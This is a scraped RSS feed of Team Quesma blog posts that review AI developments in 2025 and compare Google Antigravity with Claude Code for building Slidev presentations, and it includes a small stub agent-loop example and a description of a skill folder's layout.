&lt;p&gt;It is frustrating to see dozens of AI-generated files committed with a lazy &lt;a href="https://web.archive.org/web/20210606005031/https://www.codemopolitan.com/8-commit-messages/" rel="noopener noreferrer"&gt;fixed it&lt;/a&gt;. If a tool allows vibe coding, it should also allow vibe committing.&lt;/p&gt;

&lt;h2&gt;
  
  
  Footnotes
&lt;/h2&gt;

&lt;p&gt;[1]: See our recent post &lt;a href="https://quesma.com/blog/year-of-ai-2025/" rel="noopener noreferrer"&gt;How 2025 took AI from party tricks to production tools&lt;/a&gt;. Even the term “vibe coding” was coined in February, see Andrej Karpathy’s &lt;a href="https://karpathy.bearblog.dev/year-in-review-2025/" rel="noopener noreferrer"&gt;musings&lt;/a&gt;. Right now, &lt;a href="https://www.reddit.com/r/Anthropic/comments/1pzi9hm/claude_code_creator_confirms_that_100_of_his/" rel="noopener noreferrer"&gt;Claude Code is written in Claude Code&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;[2]: Law is codified, yet requires courts for interpretation. Even mathematics, despite its precision, leaves room for underspecification — hence the need for proof checkers, see &lt;a href="https://martin.kleppmann.com/2025/12/08/ai-formal-verification.html" rel="noopener noreferrer"&gt;AI will make formal verification go mainstream&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;[3]: &lt;a href="https://github.com/ghostty-org/ghostty/pull/8289" rel="noopener noreferrer"&gt;Ghostty requires clear AI disclosure&lt;/a&gt;, &lt;a href="https://www.mail-archive.com/gentoo-dev@lists.gentoo.org/msg99042.html" rel="noopener noreferrer"&gt;Gentoo plans to ban AI contributions&lt;/a&gt;, and there is a lot of general discussion on &lt;a href="https://samsaffron.com/archive/2025/10/27/your-vibe-coded-slop-pr-is-not-welcome" rel="noopener noreferrer"&gt;a good standard for peer-reviewing AI-assisted pull requests&lt;/a&gt;. &lt;a href="https://maxemitchell.com/writings/i-read-all-of-cloudflares-claude-generated-commits/" rel="noopener noreferrer"&gt;People actually read Cloudflare’s Claude-generated commits&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>claude</category>
      <category>vibecoding</category>
    </item>
    <item>
      <title>How 2025 took AI from party tricks to production tools</title>
      <dc:creator>Team Quesma</dc:creator>
      <pubDate>Mon, 05 Jan 2026 13:16:29 +0000</pubDate>
      <link>https://dev.to/teamquesma/how-2025-took-ai-from-party-tricks-to-production-tools-4l7b</link>
      <guid>https://dev.to/teamquesma/how-2025-took-ai-from-party-tricks-to-production-tools-4l7b</guid>
      <description>&lt;p&gt;&lt;em&gt;This blog post was authored by &lt;a href="https://p.migdal.pl/" rel="noopener noreferrer"&gt;Piotr Migdal&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Bold experiments at the start of 2025 became the industry standard by year’s end. Two paradigms drove this shift: reasoning models (spending tokens to think before answering) and agentic tool use (executing code to interact with the world).&lt;/p&gt;

&lt;p&gt;This subjective review of LLMs for software engineering covers three stages: the experimental breakthroughs of the first half of 2025, the production struggles where agents were often too chaotic to be useful, and the current state of practical, everyday tools.&lt;/p&gt;

&lt;h2&gt;
  
  
  First half of 2025
&lt;/h2&gt;

&lt;h3&gt;
  
  
  January
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;DeepSeek released the first open-source reasoning model, &lt;a href="https://github.com/deepseek-ai/DeepSeek-R1" rel="noopener noreferrer"&gt;DeepSeek-R1&lt;/a&gt;, sharing both weights and know-how. It broke the paradigm that AI is, and will remain, an oligopoly of proprietary models. Previously we only had &lt;a href="https://openai.com/o1/" rel="noopener noreferrer"&gt;o1&lt;/a&gt;, released in Sept 2024 by OpenAI.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  February
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Andrej Karpathy coined the term &lt;a href="https://en.wikipedia.org/wiki/Vibe_coding" rel="noopener noreferrer"&gt;“vibe coding”&lt;/a&gt; for programming where we primarily use plain language rather than code. For me, it took time to sink in. Now, it is a thing I do for hours a day.&lt;/li&gt;
&lt;li&gt;Later, OpenAI released &lt;a href="https://openai.com/index/introducing-gpt-4-5/" rel="noopener noreferrer"&gt;GPT-4.5&lt;/a&gt; — a real marvel. It has since been retired, and nothing matches its ability to brainstorm: more frank, less reserved and censored, creative, adjustable. I miss it, or should I say, them. It was expensive ($2 per single run in Cursor), but &lt;a href="https://p.migdal.pl/blog/2025/04/vibe-translating-quantum-flytrap/" rel="noopener noreferrer"&gt;unparalleled at advanced translations&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;OpenAI released &lt;a href="https://openai.com/index/introducing-deep-research/" rel="noopener noreferrer"&gt;Deep Research&lt;/a&gt;, which spends time doing multiple searches and summarizing them. Initially costly and slow, but still saving time on web search.&lt;/li&gt;
&lt;li&gt;Anthropic released &lt;a href="https://github.com/anthropics/claude-code" rel="noopener noreferrer"&gt;Claude Code&lt;/a&gt;, a command-line tool for agentic coding, as a research preview.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  March
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://arcprize.org/arc-agi/2/" rel="noopener noreferrer"&gt;ARC-AGI-2&lt;/a&gt; was an attempt to create a test for AI that is impossible to solve. Top models had 1% or so performance.&lt;/li&gt;
&lt;li&gt;OpenAI released its &lt;a href="https://openai.com/index/introducing-4o-image-generation/" rel="noopener noreferrer"&gt;4o Image Generation&lt;/a&gt; model, flooding the web with Studio Ghibli pastiches.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  April
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;OpenAI released &lt;a href="https://openai.com/index/introducing-o3-and-o4-mini/" rel="noopener noreferrer"&gt;o4-mini&lt;/a&gt;, a smart yet reasonably fast reasoning model. In a brief conversation, it explained Einstein’s General Theory of Relativity to me - a topic I had struggled to understand despite many approaches.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  May
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Google released &lt;a href="https://aistudio.google.com/models/veo-3" rel="noopener noreferrer"&gt;Veo 3&lt;/a&gt;, allowing us to create videos that are sometimes hard to distinguish from real recordings.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  June
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://blog.google/technology/google-deepmind/gemini-model-thinking-updates-march-2025/" rel="noopener noreferrer"&gt;Gemini 2.5 Pro&lt;/a&gt; brought Google back to the AI game. And with &lt;a href="https://blog.google/products/gemini/gemini-2-5-model-family-expands/" rel="noopener noreferrer"&gt;Gemini 2.5 Flash&lt;/a&gt;, we finally had a model good at summarization and data extraction, yet fast and cheap.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  July
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;DeepMind achieved &lt;a href="https://deepmind.google/blog/advanced-version-of-gemini-with-deep-think-officially-achieves-gold-medal-standard-at-the-international-mathematical-olympiad/" rel="noopener noreferrer"&gt;gold-level performance&lt;/a&gt; at the International Mathematical Olympiad.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  From worldwide achievement to everyday production
&lt;/h2&gt;

&lt;p&gt;And that was just the first half of 2025.&lt;/p&gt;

&lt;p&gt;Progress arrived with significant caveats. We saw impressive demos and breakthroughs that often failed in production:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Too slow or costly&lt;/strong&gt;: Early reasoning models (o1) and web search AI agents (Deep Research) were powerful but impractical for daily loops.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Overcaffeinated AI agents&lt;/strong&gt;: Tools like early Claude Code (with Sonnet 3.7) were as likely to wreak havoc on your codebase as to fix it.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The uncanny valley&lt;/strong&gt;: Image generators (initial 4o Image Generation and Nano Banana) created stunning visuals but were unreliable for complicated instructions or text rendering.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The potential was undeniable, but extracting it required heavy lifting: extensive prompt engineering beforehand and rigorous auditing afterwards. It felt like managing an intern who needs constant supervision rather than collaborating with a capable colleague.&lt;/p&gt;

&lt;p&gt;For pragmatists who ignore benchmarks and hype, the calculation is simple: does the tool improve net efficiency? A model that performs a task—a technical feat in itself—is useless if it demands more time in manual cleanup than it saves.&lt;/p&gt;

&lt;h2&gt;
  
  
  Now
&lt;/h2&gt;

&lt;p&gt;Many things that were research achievements in the first half of 2025 became everyday tools by its end.&lt;/p&gt;

&lt;h3&gt;
  
  
  Reasoning is mainstream
&lt;/h3&gt;

&lt;p&gt;The first reasoning model was OpenAI o1, released in Dec 2024. Likely thanks to DeepSeek-R1, other labs were able to move forward, making reasoning both smarter and faster. Now all major models do it, especially the leading ones - &lt;a href="https://openai.com/index/introducing-gpt-5-2/" rel="noopener noreferrer"&gt;GPT 5.2&lt;/a&gt;, &lt;a href="https://www.anthropic.com/news/claude-opus-4-5" rel="noopener noreferrer"&gt;Opus 4.5&lt;/a&gt; and &lt;a href="https://blog.google/products/gemini/gemini-3/" rel="noopener noreferrer"&gt;Gemini 3 Pro&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Deep research
&lt;/h3&gt;

&lt;p&gt;What used to be a costly Deep Research run is now an everyday search with any major AI provider - ChatGPT or Google Gemini. The peak performance of reasoning models from early 2025 is now way faster, cheaper, and more accurate. Search is no longer a separate operation but a tool that can be used iteratively and combined with other actions. AI changed from models that hallucinate a lot to ones that can web-search and fact-check themselves.&lt;/p&gt;

&lt;h3&gt;
  
  
  Open source is back in the game
&lt;/h3&gt;

&lt;p&gt;In Dec 2024, DeepSeek released the first open-source model in the league of proprietary ones. Now there are more: various iterations of &lt;a href="https://api-docs.deepseek.com/news/news251201" rel="noopener noreferrer"&gt;DeepSeek&lt;/a&gt;, &lt;a href="https://moonshotai.github.io/Kimi-K2/thinking.html" rel="noopener noreferrer"&gt;Kimi-K2 Thinking&lt;/a&gt;, &lt;a href="https://www.minimax.io/news/minimaxm1" rel="noopener noreferrer"&gt;MiniMax-M1&lt;/a&gt;, &lt;a href="https://huggingface.co/zai-org/GLM-4.7" rel="noopener noreferrer"&gt;GLM-4.7&lt;/a&gt;, and &lt;a href="https://mistral.ai/news/mistral-3" rel="noopener noreferrer"&gt;Mistral 3&lt;/a&gt;. Hell even froze over as &lt;a href="https://openai.com/index/introducing-gpt-oss/" rel="noopener noreferrer"&gt;OpenAI released open source models&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  AGI benchmarks
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://arcprize.org/arc-agi/2/" rel="noopener noreferrer"&gt;ARC-AGI-2&lt;/a&gt; and &lt;a href="https://en.wikipedia.org/wiki/Humanity%27s_Last_Exam" rel="noopener noreferrer"&gt;Humanity’s Last Exam&lt;/a&gt; were tests created to be purposefully hard, to last longer than typical benchmarks.&lt;/p&gt;

&lt;p&gt;Yet, by the end of 2025, Gemini 3 Pro scores 37% on &lt;a href="https://scale.com/leaderboard/humanitys_last_exam" rel="noopener noreferrer"&gt;HLE&lt;/a&gt;. On &lt;a href="https://arcprize.org/leaderboard" rel="noopener noreferrer"&gt;ARC-AGI-2&lt;/a&gt;, Gemini 3 Pro solves over 30%, Claude Opus 4.5 almost 40%, and GPT-5.2 over 50%. These tests were not meant to be beaten so quickly!&lt;/p&gt;

&lt;h3&gt;
  
  
  Agentic coding
&lt;/h3&gt;

&lt;p&gt;Claude Code is de facto AGI. Not necessarily superhuman yet, but capable of doing anything: if you can operate through code and external API calls, you can do anything. It took me some time to pick it up, as I favoured semi-manual use of Cursor. Yet, after multiple mentions on &lt;a href="https://hn.algolia.com/?dateRange=all&amp;amp;page=0&amp;amp;prefix=false&amp;amp;query=claude%20code&amp;amp;sort=byPopularity&amp;amp;type=story" rel="noopener noreferrer"&gt;Hacker News&lt;/a&gt;, I gave it a go and it permanently became part of my toolbox. Its development is nicely described in &lt;a href="https://newsletter.pragmaticengineer.com/p/how-claude-code-is-built" rel="noopener noreferrer"&gt;How Claude Code is built&lt;/a&gt; by Gergely Orosz, the Pragmatic Engineer.&lt;/p&gt;

&lt;p&gt;With Claude Sonnet 3.7 it was awkward. With great power comes great responsibility - and that model often wreaked havoc on the codebase while not solving the main issue. Yet with better and better models it became both faster and smarter: Sonnet 4 was better; Opus 4 better still, but slower (and expensive); Sonnet 4.5 as capable but way faster; and Opus 4.5 the same speed, but smarter.&lt;/p&gt;

&lt;p&gt;All you need is a sufficiently strong model, long context, and the ability to call tools to get everything done. They can search, gather information, extract, and visualize whatever you need. With Opus 4.5, we get a lot of power at a fast pace.&lt;/p&gt;
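&lt;p&gt;Conceptually, the loop behind such agents is simple: call the model, execute whatever tool it requests, feed the result back, and repeat until it produces an answer. Here is a minimal sketch of that loop in Python - with a hard-coded stub standing in for the real LLM API and a fake search tool, since only the loop structure is the point, not any particular provider's SDK:&lt;/p&gt;

```python
# Minimal agent loop sketch. `stub_model` is a stand-in for a real LLM
# API call (an assumption for illustration): it first requests a search,
# then answers once it has seen a tool result.

def stub_model(messages):
    """Fake LLM: asks for a search, then produces a final answer."""
    if not any(m["role"] == "tool" for m in messages):
        return {"tool": "search", "args": {"query": "Opus 4.5 release date"}}
    return {"answer": "Found it in the search results."}

TOOLS = {
    "search": lambda query: f"results for: {query}",  # stub web search
}

def run_agent(task, max_steps=5):
    messages = [{"role": "user", "content": task}]
    for _ in range(max_steps):
        reply = stub_model(messages)
        if "answer" in reply:          # model is done
            return reply["answer"]
        result = TOOLS[reply["tool"]](**reply["args"])  # run requested tool
        messages.append({"role": "tool", "content": result})
    raise RuntimeError("no answer within step budget")

print(run_agent("When was Opus 4.5 released?"))
```

Swap the stub for a real model call and the lambda for real tools (search, shell, file edits), and this is the shape of every agentic coding tool.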

&lt;p&gt;Other players followed - there are &lt;a href="https://developers.openai.com/codex/cli/" rel="noopener noreferrer"&gt;Codex CLI&lt;/a&gt; by OpenAI, &lt;a href="https://github.com/google-gemini/gemini-cli" rel="noopener noreferrer"&gt;Gemini CLI&lt;/a&gt;, and &lt;a href="https://cursor.com/cli" rel="noopener noreferrer"&gt;Cursor CLI&lt;/a&gt;. See more on testing agents and models in &lt;a href="https://quesma.com/blog/compilebench-in-harbor/" rel="noopener noreferrer"&gt;Migrating CompileBench to Harbor: standardizing AI agent evals&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Image generation
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://blog.google/technology/ai/nano-banana-pro/" rel="noopener noreferrer"&gt;Nano Banana Pro&lt;/a&gt; changed the game, from images for concept art to one able to generate &lt;a href="https://quesma.com/blog/nano-banana-pro-intelligence-with-tools/" rel="noopener noreferrer"&gt;infographics&lt;/a&gt; and &lt;a href="https://quesma.com/blog/ai-is-black-mirror/" rel="noopener noreferrer"&gt;charts&lt;/a&gt; - factually correct, based on web searches. You can easily add to your agentic workflow - &lt;a href="https://quesma.com/blog/claude-skills-not-antigravity/" rel="noopener noreferrer"&gt;using Antigravity or Claude Skills&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Advanced uses
&lt;/h3&gt;

&lt;p&gt;AI is no longer just a tool for maths homework or research challenges like international olympiads. It is becoming a tool for real work.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://scottaaronson.blog/?p=9183" rel="noopener noreferrer"&gt;Quantum computing researcher Scott Aaronson&lt;/a&gt; and &lt;a href="https://terrytao.wordpress.com/tag/artificial-intelligence/" rel="noopener noreferrer"&gt;Field’s Medalist Terence Tao&lt;/a&gt; use AI to advance their studies.&lt;/p&gt;

&lt;p&gt;Sure, it still makes silly mistakes. But in smart hands, it gets even smarter.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;It was the most intense year yet for AI development. One crucial part is that many things that were great tech demos, but not usable in everyday work, are now standard tools.&lt;/p&gt;

&lt;p&gt;I have only scratched the surface of selected model releases (not even all I used), let alone all the demos that mesmerized me or the research papers. I recommend the insightful &lt;a href="https://karpathy.bearblog.dev/year-in-review-2025/" rel="noopener noreferrer"&gt;2025 LLM Year in Review by Andrej Karpathy&lt;/a&gt; (who also gave us “vibe coding”), a nice overview in &lt;a href="https://simonwillison.net/2025/Dec/31/the-year-in-llms/" rel="noopener noreferrer"&gt;2025: The year in LLMs by Simon Willison&lt;/a&gt;, and &lt;a href="https://news.smol.ai/" rel="noopener noreferrer"&gt;AI News&lt;/a&gt;, a daily newsletter I have been following the whole year.&lt;/p&gt;

&lt;p&gt;Even though my job is fully focused on AI, and I am excited by it in my free time as well, it is impossible to keep track of everything.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>llm</category>
    </item>
    <item>
      <title>Antigravity feels heavy and Claude Skills are light</title>
      <dc:creator>Team Quesma</dc:creator>
      <pubDate>Thu, 18 Dec 2025 13:33:38 +0000</pubDate>
      <link>https://dev.to/teamquesma/antigravity-feels-heavy-and-claude-skills-are-light-9b0</link>
      <guid>https://dev.to/teamquesma/antigravity-feels-heavy-and-claude-skills-are-light-9b0</guid>
      <description>&lt;p&gt;&lt;em&gt;This blog post was authored by &lt;a href="https://p.migdal.pl/" rel="noopener noreferrer"&gt;Piotr Migdal&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In less than a month there were three frontier model releases: Gemini 3 Pro, Claude Opus 4.5 and GPT-5.2. Moreover, Google shipped a new IDE, &lt;a href="https://antigravity.google/" rel="noopener noreferrer"&gt;Antigravity&lt;/a&gt;, promising better integration with their models and the browser.&lt;/p&gt;

&lt;p&gt;It sounds like a wonder. On Hacker News I saw &lt;a href="https://christopherkrapu.com/blog/2025/antigravity-stat-mech/" rel="noopener noreferrer"&gt;an interactive visualization of statistical physics&lt;/a&gt; - the &lt;a href="https://epoch.ai/benchmarks/gpqa-diamond" rel="noopener noreferrer"&gt;PhD-level STEM skills of Gemini 3 Pro&lt;/a&gt; combined with Antigravity’s browser integration. It was even more tempting as it had support for Nano Banana Pro (&lt;a href="https://quesma.com/blog/nano-banana-pro-intelligence-with-tools/" rel="noopener noreferrer"&gt;a game-changer for visualization&lt;/a&gt;, including &lt;a href="https://quesma.com/blog/ai-is-black-mirror/" rel="noopener noreferrer"&gt;creating charts&lt;/a&gt;), so it can create visual assets on the fly, with all the context at hand. It was all spiced up by the fact that &lt;a href="https://www.businessinsider.com/openai-planned-acquisition-windsurf-called-off-ceo-poached-google-2025-7?IR=T" rel="noopener noreferrer"&gt;Google acquihired the Windsurf team&lt;/a&gt;, arguably the strongest competitor of Cursor.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F45fm6jx72z374q9i1pif.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F45fm6jx72z374q9i1pif.webp" alt="I liked the name Antigravity. Not just as a physicist, but as someone who loves puns and easter eggs; and Antigravity is almost definitely a play on words on [an xkcd strip](https://xkcd.com/353/) and AGI - in the comman line, it is  raw `agy` endraw ." width="800" height="497"&gt;&lt;/a&gt;I liked the name Antigravity. Not just as a physicist, but as someone who loves puns and easter eggs; and Antigravity is almost definitely a play on words on &lt;a href="https://xkcd.com/353/" rel="noopener noreferrer"&gt;an xkcd strip&lt;/a&gt; and AGI - in the comman line, it is &lt;code&gt;agy&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;I decided to give it a try - yet went back to Claude Code. Let me share why!&lt;/p&gt;




&lt;h2&gt;
  
  
  Slide side by side
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzuy9u3o2cmqvxjvlnh3w.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzuy9u3o2cmqvxjvlnh3w.webp" alt="Antigravitz and Claude Code UI side by side" width="800" height="323"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To test Antigravity vs Claude Code, I wanted to have the same project, side-by-side, spending the same amount of time and effort. The idea was not to create a proper benchmark - for that, &lt;code&gt;n=1&lt;/code&gt; would not be enough. Rather, I wanted to see not only the result, but the overall user experience.&lt;/p&gt;

&lt;p&gt;To make it a challenge, I decided to create slides in Markdown using &lt;a href="https://sli.dev/" rel="noopener noreferrer"&gt;Slidev&lt;/a&gt;. That makes it a comprehensive check of each tool’s ability to use a framework, understand an advanced topic, and create consistent graphics. As I had just had a discussion with a quantum information researcher, Artur Ekert, I went with this prompt:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Use Slidev and pnpm to create a short presentation on Device Independent Quantum Key Distribution. The presentation was to be held in Hong Kong, for a young audience - use consistent anime style for pictures. Generate images with Nano Banana Pro.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;I didn’t interfere with the content - this was a test of the workflow, not an attempt to ship the slides. Here’s the result:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flrh55uzfo7dahpgpiswv.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flrh55uzfo7dahpgpiswv.webp" alt="Example slide, created with Antigravity. See the presentation and its source." width="800" height="489"&gt;&lt;/a&gt;Example slide, created with Antigravity. See &lt;a href="https://p.migdal.pl/vibe-slides-qkd-agy/" rel="noopener noreferrer"&gt;the presentation&lt;/a&gt; and &lt;a href="https://github.com/stared/vibe-slides-qkd-agy" rel="noopener noreferrer"&gt;its source&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fujk6znhpp854i9760vjl.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fujk6znhpp854i9760vjl.webp" alt="And this example from Claude Code. See the presentation and its source." width="800" height="454"&gt;&lt;/a&gt;And this example from Claude Code. See &lt;a href="https://p.migdal.pl/vibe-slides-qkd-cc/" rel="noopener noreferrer"&gt;the presentation&lt;/a&gt; and &lt;a href="https://github.com/stared/vibe-slides-qkd-cc" rel="noopener noreferrer"&gt;its source&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;In both cases it worked! There are some rough edges, but given the ease of use, I was impressed by both. Yet, while working with Claude Code was a breeze, my experience with Antigravity was full of frustration.&lt;/p&gt;




&lt;h2&gt;
  
  
  Impressions of Antigravity
&lt;/h2&gt;

&lt;p&gt;When I need to edit files manually or check new models, I go with &lt;a href="https://cursor.com/" rel="noopener noreferrer"&gt;Cursor&lt;/a&gt; - for example, writing this blog post. Yet, here I wanted to see if Antigravity makes it better.&lt;/p&gt;

&lt;p&gt;I saw that in some cases it is better at creating websites, as it has built-in browser support (see &lt;a href="https://alokbishoyi.com/blogposts/reverse-engineering-browser-automation.html" rel="noopener noreferrer"&gt;this reverse engineering analysis&lt;/a&gt; to understand how it works). I also discovered that it has a native way of generating images with Nano Banana Pro. It is (allegedly) better integrated with Gemini 3 Pro. Or at least I assumed that since it is developed by Google, all context engineering tweaks would be focused on their top model as the first-class citizen.&lt;/p&gt;

&lt;p&gt;Creating images in the editor (with context of the whole project) is immensely useful. Much like why we have AI editors in the first place, rather than copying and pasting code to a chat editor, and copying it back to the project.&lt;/p&gt;

&lt;p&gt;Sadly, good things end here.&lt;/p&gt;

&lt;p&gt;The first thing I noticed was that it felt slow. The model itself isn’t lightning-fast, but Antigravity felt heavier (pun absolutely intended) than Cursor, and the built-in browser took ages. Second, the interface is underpolished - for example, when the model needs my action, it can be hidden (literally folded) in the UI. Third, it feels ill-prompted: I asked it to check something, and instead of doing that, it gets trigger-happy. Think early days of Cursor + Sonnet 3.7. Fourth, it soon told me I was out of tokens and needed to wait - with no option to pay to continue. Frankly, I don’t understand why. I guess no one does.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpwilhwfbldskemozjxqe.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpwilhwfbldskemozjxqe.webp" alt="I wanted to create a web-based game to see where Antigravity shines… but was not able to." width="800" height="494"&gt;&lt;/a&gt;I wanted to create a web-based game to see where Antigravity shines… but was not able to.&lt;/p&gt;

&lt;p&gt;I turned out to be one of the lucky ones - &lt;a href="https://www.promptarmor.com/resources/google-antigravity-exfiltrates-data" rel="noopener noreferrer"&gt;there are data-exfiltration risks&lt;/a&gt; and &lt;a href="https://old.reddit.com/r/google_antigravity/comments/1p82or6/google_antigravity_just_deleted_the_contents_of/" rel="noopener noreferrer"&gt;Google Antigravity may delete the contents of your whole drive&lt;/a&gt;. Live by vibe coding, die by vibe coding.&lt;/p&gt;

&lt;p&gt;Sure, you may give it a try - but it does not seem production-ready.&lt;/p&gt;




&lt;h2&gt;
  
  
  The bliss of Claude Code
&lt;/h2&gt;

&lt;p&gt;So, I went back to Claude Code, my go-to vibe coding tool, which I usually use within the &lt;a href="https://ghostty.org/" rel="noopener noreferrer"&gt;Ghostty&lt;/a&gt; terminal.&lt;/p&gt;

&lt;p&gt;First: checking the output. Without it, you’re coding blind, which generally makes no sense (how many of you can code a website without ever looking at it?). I use &lt;a href="https://github.com/lackeyjb/playwright-skill" rel="noopener noreferrer"&gt;lackeyjb/playwright-skill&lt;/a&gt;. It just works - opening a website and taking a screenshot happens in the blink of an eye.&lt;/p&gt;

&lt;p&gt;Since I wanted to use Nano Banana Pro, I asked Claude Code to use an API to generate images. It took a few prompts: it tried to persuade me that Nano Banana Pro is a made-up name and that the model &lt;code&gt;gemini-3-pro-image-preview&lt;/code&gt; does not exist. This is a typical failure mode: major models can be oblivious to things past their knowledge cutoff (and they sometimes refuse to web-search because they “know better”). Fortunately, pointing it to my last blog post and the documentation helped.&lt;/p&gt;

&lt;p&gt;To avoid repeating those correction cycles (which model to use, what parameters to pass), I created a &lt;a href="https://code.claude.com/docs/en/skills" rel="noopener noreferrer"&gt;Claude Skill&lt;/a&gt;, &lt;code&gt;~/.claude/skills/nano-banana-pro&lt;/code&gt;. It has two components: &lt;code&gt;SKILL.md&lt;/code&gt; (essentially its &lt;code&gt;README.md&lt;/code&gt;) and a script that actually runs it. I use &lt;a href="https://docs.astral.sh/uv/guides/scripts/" rel="noopener noreferrer"&gt;uv scripts&lt;/a&gt; so dependencies are &lt;a href="https://packaging.python.org/en/latest/specifications/inline-script-metadata/#inline-script-metadata" rel="noopener noreferrer"&gt;declared in the header&lt;/a&gt;. I created it in no time - and so can you. Oftentimes it may be easier to vibe code your own skill, tweaked to your use case and workflow, than to search for one. Ironically, the hardest part is &lt;a href="https://ankursethi.com/blog/gemini-api-key-frustration/" rel="noopener noreferrer"&gt;getting a Gemini API key&lt;/a&gt;.&lt;/p&gt;
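&lt;p&gt;For reference, such a skill is just a folder. A minimal sketch of the layout - the script name and the &lt;code&gt;google-genai&lt;/code&gt; dependency are my assumptions for illustration, not the skill’s actual contents:&lt;/p&gt;

```text
~/.claude/skills/nano-banana-pro/
├── SKILL.md     # when to use the skill, which model, what parameters to pass
└── generate.py  # uv script that calls the image API

# Top of generate.py - PEP 723 inline metadata, read by `uv run generate.py`:
# /// script
# requires-python = ">=3.11"
# dependencies = ["google-genai"]
# ///
```

With the dependencies declared inline, Claude Code can invoke the script with a single &lt;code&gt;uv run&lt;/code&gt; call, with no virtualenv setup.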

